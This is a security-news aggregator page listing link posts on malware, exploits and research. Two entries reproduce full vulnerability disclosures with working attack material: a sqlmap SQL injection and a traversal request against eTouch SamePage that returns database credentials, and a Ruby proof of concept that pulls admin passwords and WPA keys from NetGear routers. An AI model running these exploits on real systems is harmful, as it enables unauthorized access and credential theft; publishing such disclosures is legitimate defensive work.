Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Phase Bot - A Fileless Rootkit

December 12, 2014, 4:45 am
$
0
0
Phase Bot is a fileless rootkit that went on sale during late October, the bot is fairly cheap ($200) and boasts features such as formgrabbing, ftp stealing, and of course the ability to run without a file.

more here........http://www.malwaretech.com/2014/12/phase-bot-fileless-rootkit.html
Search

Trojanized and Pirated Assassins Creed app

December 12, 2014, 9:09 pm
$
0
0
During our daily research, we recently came across Android malware disguising itself as an Assassins Creed app, which is a popular paid gaming application. The malware in question will install a pirated version of the Assassins Creed game that functions normally, making end user oblivious to the malicious activities it performs in background.

more here........http://research.zscaler.com/2014/12/trojanized-and-pirated-assassins-creed.html

Microsoft Tool Updates

February 11, 2015, 5:31 pm
$
0
0
Microsoft recently released an update (KB 3004375) that allows certain versions the Windows OS to record command line options, if Process Tracking is enabled, in the Windows Event Log. Microsoft also recently upgraded Sysmon to version 2.0, with some interesting new capabilities.

more here.............http://windowsir.blogspot.com/2015/02/tools.html

Microsoft Internet Explorer 9-11 Windows 7-8.1 Vulnerability (patched in late 2014)

February 12, 2015, 4:08 am
$
0
0
I. Vunerability Description: Uninitialized Memory Corruption Lead to Code Execution.

II.Analysis: I crafted an HTML file called 1.html and opened it with IE11/Windows 8.1, the following crash happened

more here..........http://www.vnsecurity.net/research/2015/02/12/msie-vuln-analysis.html

Decrypting TLS Browser Traffic With Wireshark – The Easy Way!

February 12, 2015, 4:11 am
$
0
0
Most IT people are somewhat familiar with Wireshark.  It is a traffic analyzer, that helps you learn how networking works, diagnose problems and much more. One of the problems with the way Wireshark works is that it can’t easily analyze encrypted traffic, like TLS.
more here....https://jimshaver.net/2015/02/11/decrypting-tls-browser-traffic-with-wireshark-the-easy-way/

Volatility plugin for Dyre

February 12, 2015, 4:13 am
$
0
0
Dyre is a banking malware discovered in middle of 2014. It can intercept HTTPS traffic, using techniques documented in this Introduction to Dyreza.

In the context of our review of malware faced by customers, we need to rapidly respond and assess the risk. Dyre is malware found in such context, and we are releasing a Volatility plugin that we are using internally to dump configuration in memory for Dyre (Dyreza) samples.

more here........http://cybermashup.com/2015/02/11/volatility-plugin-for-dyre/

A Crypto Trick That Makes Software Nearly Impossible to Reverse-Engineer and Jacob Torrey on Common Misunderstandings/Weaknesses of Hares

February 12, 2015, 6:06 am
$
0
0
Software reverse engineering, the art of pulling programs apart to figure out how they work, is what makes it possible for sophisticated hackers to scour code for exploitable bugs. It’s also what allows those same hackers’ dangerous malware to be deconstructed and neutered. Now a new encryption trick could make both those tasks much, much harder.

more here.........http://www.wired.com/2015/02/crypto-trick-makes-software-nearly-impossible-reverse-engineer/


and here is Jacob Torrey on Common Misunderstandings and Weaknesses of Hares talked about in wired
here..... http://blog.jacobtorrey.com/hares-faq

LD_NOT_PRELOADED_FOR_REAL

February 12, 2015, 4:32 am
$
0
0
LD_PRELOAD is probably one of the most amusing feature of Linux operating systems. It is the starting piece of dynamic instrumentation, reverse engineering madness and every fun userland rootkits. The problem is it is fairly easy to detect, spoiling the fun for everyone. This article is just a schizophrenic discussion on trying to detect LD_PRELOAD and implementing anti-detection countermeasures.

more here.........http://haxelion.eu/article/LD_NOT_PRELOADED_FOR_REAL/
Search

Session Hijacking of EBay

February 12, 2015, 4:44 am
$
0
0
What follows is the communication between the EBay security team and myself.  I've identified the vulnerability, YET...  They refuse to fix it -- To be honest, I don't believe they took the time to actually read it based on their response -- If they did, then they should fire whoever reviewed my concern, they obviously have NO clue about what it is they do.

My only recourse is to go public in hopes the community can pressure them to fix it.

more here.......http://pastebin.com/9kvgprpf

and updated video on Session Hijacking of EBay here....https://www.youtube.com/watch?v=NXdHT6TpeFk#t=1394

How I Hacked Your Facebook Photos

February 12, 2015, 4:46 am
$
0
0
What if your photos get deleted without your knowledge?
Obviously that's very disgusting isn't it? Yup this post is about a vulnerability found by me which allows a malicious user to delete any photo album on Facebook. Any photo album owned by an user or a page or a group could be deleted.

more here..........http://www.7xter.com/2015/02/how-i-hacked-your-facebook-photos.html

CTB-Locker Dropper Analysis

February 12, 2015, 7:06 am
$
0
0
You will find below an attempt to understand and describe the operation of CTB-Locker dropper recent malware (CTB Locker: a new massive crypto-ransowmare campaign).

more here...........http://christophe.rieunier.name/securite/CTB-Locker/CTB-Locker_analysis_en.php

Attackers Using New MS SQL Reflection Techniques

February 12, 2015, 7:39 am
$
0
0
The bad guys are using a fairly new technique to tamper with the Microsoft SQL Server Resolution Protocol (MC-SQLR) and launch DDoS attacks.

In an advisory released this morning, Akamai's Prolexic Security Engineering & Response Team (PLXsert) described it as a new type of reflection-based distributed denial of service (DDoS) attack.

PLXsert first spotted attackers using the technique in October. Last month, researcher Kurt Aubuchon studied another such attack and offered an analysis here. PLXsert replicated this attack by creating a script based on Scapy, an open-source packet manipulation tool.

How it works here.............https://blogs.akamai.com/2015/02/plxsert-warns-of-ms-sql-reflection-attacks.html

First ever Dark Leaks auction: I was the lead programmer for Silk Road 2.0.

February 12, 2015, 8:58 am
$
0
0
Good morning.

Allow me to introduce myself. My name is SR Doug.

In October 2013, I was hired by Dread Pirate Roberts a/k/a Blake Benthall as
lead programmer for Silk Road 2.0. From November 2013 up until the FBI seizure
in late 2014, I oversaw the website from behind the curtains and managed the
bulk of its servers. I was paid over 1,200 BTC for my service.

I have been sitting on a large database backup containing the usernames and
hashed passwords of 476,122 users, 51,490 deposit addresses, 7,756 plaintext
passwords, 13,280 product listings, 52,481 private messages, 145,493
transaction records and the entire Silk Road source code.

more here......https://bitcointalk.org/index.php?topic=952177


PS: Not sure of the validity of this poster but interesting never the less

(^Exploiting)\s*(CVE-2015-0318)\s*(in)\s*(Flash$)

February 12, 2015, 12:18 pm
$
0
0
So; issue 199/PSIRT-3161/CVE-2015-0318. Quick summary - it’s a bug in the PCRE regex engine as used in Flash. (Note that the published version of the avmplus code is significantly out of date; there are a number of other vulnerabilities present that have already been fixed by Adobe; so auditing it can be a little frustrating!).

Spoiler: it’s exploitable. Grab the exploit from the issues page and read along here.....http://googleprojectzero.blogspot.gr/2015/02/exploitingscve-2015-0318sinsflash.html

eTouch SamePage v4.4.0.0.239 multiple vulnerabilities

February 13, 2015, 2:16 am
$
0
0
Couldn’t find anyone to contact regarding this, so dropping it.

eTouch SamePage v4.4.0.0.239 multiple vulnerabilities


http://www.etouch.net/products/samepage/index.html

Enterprise trial was installed in an Ubuntu virtual machine with MySQL. By default, the listening port is 18080.

Required on the Ubuntu machine to install the SamePage binary successfully:
sudo apt-get install libstdc++6:i386 libc6:i386 libXext6:i386 mysql-server

Trial available here:
http://support.etouch.net/cm/wiki/?id=8889

———

Unauthenticated time-based SQL injection in /cm/blogrss/feed servlet

The following URL is vulnerable to a time-based SQL injection in the catId parameter:

http://192.168.1.25:18080/cm/blogrss/feed?entity=mostviewedpost&analyticsType=blog&catId=-1&count=10&et_cw=850&et_ch=600

Exploitation with sqlmap:

Brandons-iMac:sqlmap bperry$ ./sqlmap.py -u "http://192.168.1.25:18080/cm/blogrss/feed?entity=mostviewedpost&analyticsType=blog&catId=-1&count=10&et_cw=850&et_ch=600" --dbms=mysql -p catId --level=5 --risk=3 -o --technique=t --time-sec=10 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-fd632e5}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:08:19

[19:08:19] [INFO] testing connection to the target URL
[19:08:19] [INFO] heuristics detected web page charset 'ascii'
[19:08:19] [INFO] testing NULL connection to the target URL
[19:08:19] [INFO] NULL connection is supported with HEAD header
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: catId (GET)
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: entity=mostviewedpost&analyticsType=blog&catId=-1) AND 6412=BENCHMARK(10000000,MD5(0x73764b7a)) AND (3198=3198&count=10&et_cw=850&et_ch=600
---
[19:08:19] [INFO] testing MySQL
[19:08:19] [INFO] confirming MySQL
[19:08:19] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL >= 5.0.0
[19:08:19] [INFO] fetching database names
[19:08:19] [INFO] fetching number of databases
[19:08:19] [INFO] resumed: 4
[19:08:19] [INFO] resumed: information_schema
[19:08:19] [INFO] resumed: mysql
[19:08:19] [INFO] resumed: performance_schema
[19:08:19] [INFO] resumed: samepage
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] samepage

[19:08:19] [INFO] fetched data logged to text files under '/Users/bperry/.sqlmap/output/192.168.1.25'

[*] shutting down at 19:08:19

Brandons-iMac:sqlmap bperry$


———
Authenticated arbitrary file read via /cm/newui/blog/export.jsp

The following authenticated GET request will read the cm.xml file from the web server installation directory, which contains the database credentials. While authentication is required, by default, creating a user using the user sign-up page is simple.


Request:

GET /cm/newui/blog/export.jsp?filepath=../conf/Catalina/localhost/cm.xml&start=true&et_cw=350&et_ch=100 HTTP/1.1
Host: 192.168.1.22:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.22:8080/cm/newui/blog/export.jsp?pkey=64616d73657373696f6e696468616c6c61626f6c6c613b313432323331333135393433341422313179983&blogalias=fdsaffd&blogdesc=fdsafdsafdsa&starttime=1422313179983&start=true
Cookie: JSESSIONID=8D2B23DCF68ACD2623B390942E71F2E5; c_wiki_browser=1
Connection: keep-alive




Response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Disposition: attachment; filename=cm.xml
Content-Type: application/zip
Content-Length: 864
Date: Tue, 27 Jan 2015 00:42:53 GMT

<Context path="/cm" docBase="../../cm" debug="0" reloadable="false" crossContext="true" autodeploy="true">
        <Resource name="CMPOOL" auth="Container"  type="com.atomikos.jdbc.nonxa.NonXADataSourceBean"
                factory="org.apache.naming.factory.BeanFactory"
                uniqueResourceName="CMPOOL"
                driverClassName="com.mysql.jdbc.Driver"
                user="root"
                password="password"
                poolSize="10"
                validatingQuery ="SELECT 1"
                url="jdbc:mysql://localhost:3306/samepage" />
        <Transaction factory="com.atomikos.icatch.jta.UserTransactionFactory" />
        <Resource name="UserTransaction" auth="Container" type="javax.transaction.UserTransaction"
                factory="com.atomikos.icatch.jta.UserTransactionFactory" />
        <Resource name="TransactionManager" auth="Container" type="com.atomikos.icatch.jta.UserTransactionManager"
        factory="org.apache.naming.factory.BeanFactory" />
</Context>


Authored by Brandon Perry 
Search

EggSandwich – An Egghunter with Integrity

February 13, 2015, 2:19 am
$
0
0
A while back I introduced the EggSandwich in my tutorial on Egghunting as a means to implement some basic integrity checks into the traditional Egghunter and overcome the problem of fragmented / corrupted shellcode. I recently took the opportunity to update my implementation so it could accomodate shellcode of any size. The code and a brief explanation follows here..........http://www.securitysift.com/eggsandwich-egghunter-integrity/

NetGear WNDR Authentication Bypass / Information Disclosure PoC & Detailed Write-up

February 13, 2015, 9:09 am
$
0
0
>> NetGear WNDR Authentication Bypass / Information Disclosure

Reported by:
----
Peter Adkins <peter.adkins () kernelpicnic.net>

Access:
----
Local network; unauthenticated access.
Remote network; unauthenticated access*.

Tracking and identifiers:
----
CVE - Mitre contacted; not yet allocated.

Platforms / Firmware confirmed affected:
----
NetGear WNDR3700v4 - V1.0.0.4SH
NetGear WNDR3700v4 - V1.0.1.52
NetGear WNR2200 - V1.0.1.88
NetGear WNR2500 - V1.0.0.24

Additional platforms believed to be affected:
----
NetGear WNDR3800
NetGear WNDRMAC
NetGear WPN824N
NetGear WNDR4700

Vendor involvement:
----
2015-01-18 - Initial contact with NetGear regarding vulnerability.
2015-01-18 - NetGear advised to email support with concerns.
2015-01-18 - Email sent to NetGear (support).
2015-01-19 - Email sent to Mitre.
2015-01-20 - NetGear (support) advised that a ticket had been created.
2015-01-21 - NetGear (support) requested product verification.
2015-01-21 - Replied to NetGear with information requested.
2015-01-23 - NetGear (support) requested clarification of model.
2015-01-23 - Replied to NetGear with list of affected models.
2015-01-27 - NetGear (support) replied with router security features.
2015-01-27 - Replied to NetGear and reiterated vulnerability.
2015-01-29 - Email sent to NetGear (OpenSource) regarding issue.
2015-01-30 - Case auto-closure email received from NetGear (support).
2015-02-01 - Reply from Mitre requesting additional information.
2015-02-01 - Email to Mitre with additional information.
2015-02-11 - Vulnerability published to Bugtraq and GitHub.

Mitigation:
----
* Ensure remote / WAN management is disabled on the affected devices.
* Only allow trusted devices access to the local network.

Notes:
----
* These vulnerabilities can be leveraged "externally" over the internet,
but require devices to have remote / WAN management enabled.

* Due to the location of this issue (net-cgi) this vulnerability may be
present in other devices and firmware revisions not listed in this
document.

* In the absence of a known security contact these issues were reported
to NetGear support. The initial response from NetGear support was that
despite these issues "the network should still stay secure" due to a
number of built-in security features. Attempts to clarify the nature of
this vulnerability with support were unsuccessful. This ticket has since
been auto-closed while waiting for a follow up. A subsequent email sent
to the NetGear 'OpenSource' contact has also gone unanswered.

* If you have a NetGear device that is believed to be affected and can
confirm whether the PoC works successfully, please let me know and I
will update the copy of this document on GitHub (see below) and provide
credit for your findings.

----
"Genie" SOAP Service
----

A number of NetGear WNDR devices contain an embedded SOAP service that
is seemingly for use with the NetGear Genie application. This service
allows for viewing and setting of certain router parameters, such as:

 * WLAN credentials and SSIDs.
 * Connected clients.
 * Guest WLAN credentials and SSIDs.
 * Parental control settings.

At first glance, this service appears to be filtered and authenticated;
HTTP requests with a `SOAPAction` header set but without a session
identifier will yield a HTTP 401 error. However, a HTTP request with a
blank form and a `SOAPAction` header is sufficient to execute certain
requests and query information from the device.

As this SOAP service is implemented by the built-in HTTP / CGI daemon,
unauthenticated queries will also be answered over the internet if
remote management has been enabled on the device. As a result, affected
devices can be interrogated and hijacked with as little as a well placed
HTTP query.

The attached proof of concept uses this service in order to extract the
administrator password, device serial number, WLAN details, and various
details regarding clients currently connected to the device.

A copy of this document, as well as the proof of concept below and a
more detailed write-up has been made available via GitHub:

 * https://github.com/darkarnium/secpub/tree/master/NetGear/SOAPWNDR

----
Ruby PoC
----

require 'optparse'
require 'nokogiri'
require 'restclient'

# Set defaults and parse command line arguments
options = {}

options[:addr] = "192.168.1.1"
options[:port] = 80
options[:ssl] = false

OptionParser.new do |option|

  option.on("--address [ADDRESS]", "Destination hostname or IP") do |a|
    options[:addr] = a
  end

  option.on("--port [PORT]", "Destination TCP port") do |p|
    options[:port] = p
  end

  option.on("--[no-]ssl", "Destination uses SSL") do |s|
    options[:ssl] = s
  end

  option.parse!

end

# Define which SOAPActions we will be using.
actions = [
  {
    :name => "Fetch password",
    :call => "lan_config_security_get_info",
    :soap => "LANConfigSecurity:1#GetInfo"
  },
  {
    :name => "Fetch WLAN",
    :call => "wlan_config_get_info",
    :soap => "WLANConfiguration:1#GetInfo"
  },
  {
    :name => "Fetch WPA Security Keys",
    :call => "wlan_config_get_wpa_keys",
    :soap => "WLANConfiguration:1#GetWPASecurityKeys"
  },
  {
    :name => "Fetch hardware",
    :call => "device_info_get_info",
    :soap => "DeviceInfo:1#GetInfo"
  },
  {
    :name => "Fetch hardware",
    :call => "device_info_get_attached",
    :soap => "DeviceInfo:1#GetAttachDevice"
  }
  #{
  #  :name => "Dump configuration",
  #  :call => "device_config_get_config_info",
  #  :soap => "DeviceConfig:1#GetConfigInfo"
  #}
]

def device_info_get_info(xml)
  puts "[*] Model Number: #{xml.xpath('//ModelName').text}"
  puts "[*] Serial Number: #{xml.xpath('//SerialNumber').text}"
  puts "[*] Firmware Version: #{xml.xpath('//Firmwareversion').text}"
end

def lan_config_security_get_info(xml)
  puts "[*] Admin Password: #{xml.xpath("//NewPassword").text}"
end

def wlan_config_get_info(xml)
  puts "[*] WLAN SSID: #{xml.xpath('//NewSSID').text}"
  puts "[*] WLAN Enc: #{xml.xpath('//NewBasicEncryptionModes').text}"
end

def wlan_config_get_wpa_keys(xml)
  puts "[*] WLAN WPA Key: #{xml.xpath('//NewWPAPassphrase').text} "
end

def device_config_get_config_info(xml)
  puts "[*] Base64 Config: #{xml.xpath('//NewConfigFile').text} "
end

def device_info_get_attached(xml)

  # Data is '@' delimited.
  devices = xml.xpath('//NewAttachDevice').text.split("@")
  devices.each_index do |i|

    # First element is a device count.
    if i == 0
      next
    end

    # Split by ';' which pulls out the device IP, name and MAC.
    detail = devices[i].split(";")
    puts "[*] Attached: #{detail[2]} - #{detail[1]} (#{detail[3]})"

  end

end

# Form endpoint based on protocol, no path is required.
if options[:ssl]
  endpoint = "https://#{options[:addr]}:#{options[:port]}/"
else
  endpoint = "http://#{options[:addr]}:#{options[:port]}/"
end

# Iterate over all actions and attempt to execute.
puts "[!] Attempting to extract information from #{endpoint}"

actions.each do |action|

  # Build the target URL and setup the HTTP client object.
  request = RestClient::Resource.new(
    endpoint,
    :verify_ssl => OpenSSL::SSL::VERIFY_NONE)

  # Fire the request and ensure a 200 OKAY.
  begin
    response = request.post(
      { "" => "" },
      { "SOAPAction" => "urn:NETGEAR-ROUTER:service:#{action[:soap]}"})
  rescue
    puts "[!] Failed to query remote host."
    abort
  end

  if response.code != 200
    puts "[-] '#{action[:name]}' failed with response: #{response.code}"
    next
  end

  # Parse XML document.
  xml = Nokogiri::XML(response.body())

  if xml.xpath('//ResponseCode').text == '401'
    puts "[-] '#{action[:name]}' failed with a SOAP error (401)"
    next
  end

  # Send to the processor.
  send(action[:call], xml)

end

# FIN.

A New UAC Bypass Method that Dridex Uses

February 13, 2015, 2:31 am
$
0
0
Today, I would like to describe a new UAC bypass method that has been used by the Dridex malware since December, 2014 here.....http://blog.jpcert.or.jp/.s/2015/02/a-new-uac-bypass-method-that-dridex-uses.html

How to circumvent executable space protection on 64-bit Linux using a technique known as return-oriented programming.

February 13, 2015, 2:47 am
$
0
0
Nobody’s perfect. Particularly not programmers. Some days, we spend half our time fixing mistakes we made in the other half. And that’s when we’re lucky: often, a subtle bug escapes unnoticed into the wild, and we only learn of it after a monumental catastrophe.

more here.........http://crypto.stanford.edu/~blynn/rop/

White Lightning

February 13, 2015, 2:51 am
$
0
0
WhiteLightning is the next generation of MiTM web exploitation. This tool was created for the Red Team, OpSec conscience pen tester, and for future inovators to show what can happen when you put a little logic into a framework such as this.

more here...........https://github.com/TweekFawkes/White_Lightning
Viewing all 8064 articles
Browse latest View live
Search